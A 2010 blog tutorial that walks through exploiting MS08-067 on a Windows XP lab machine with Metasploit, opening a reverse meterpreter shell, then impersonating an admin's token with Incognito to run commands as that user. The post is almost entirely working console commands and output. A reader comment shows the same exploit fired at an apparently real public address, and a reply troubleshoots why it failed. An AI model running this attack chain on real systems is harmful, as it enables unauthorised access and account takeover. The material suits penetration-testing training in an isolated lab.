Using Metasploit’s Incognito To Impersonate User Tokens

January 30, 2010 – 10:48 AM

I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system.  You can think of tokens as a web “cookie” which is just an object that holds your security information for the entire login process so that you don’t have to re-authenticate yourself on the system or network each time you want to access another object.  You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)

On this particular machine, “Troy” is an Admin account.

(without all the screenshots – sorry dial-up users)

We’ll start off by launching Metasploit and exploiting the system.  For this we need to make sure the payload returns a meterpreter session back to us:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options:
Name     Current Setting  Required  Description
—-     —————  ——–  ———–
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):
Name      Current Setting  Required  Description
—-      —————  ——–  ———–
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LHOST                      yes       The local address
LPORT     4444             yes       The local port

Exploit target:
Id  Name
—  —-
0   Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)

meterpreter >

Once we have a meterpreter session we can launch the Incognito module, list the available tokens and impersonate the one you want:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > use Incognito
Loading extension incognito…success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
VM-WINXP\Troy
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token vm-winxp\\troy
[+] Delegation token available
[+] Successfully impersonated user VM-WINXP\Troy
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > execute -f cmd.exe -i -t
Process 416 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>whoami
whoami
VM-WINXP\Troy
C:\WINDOWS\system32>exit
meterpreter > getuid
Server username: VM-WINXP\Troy
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Complete success without having to crack passwords or “pass the hash”.

  1. 2 Responses to “Using Metasploit’s Incognito To Impersonate User Tokens”

  2. [*] Started reverse handler on 192.168.1.111:443
    [-] Exploit failed: The connection was refused by the remote host (207.46.124.214:445).
    [*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >

    By xpl on Apr 23, 2010

  3. This is because Egress filterting or AV is preventing it to connect back to your machine.

    By saurabh harit on Sep 28, 2010

You must be logged in to post a comment.

Copyright 2008-2024 PC Sympathy - Entries (RSS) - Sitemap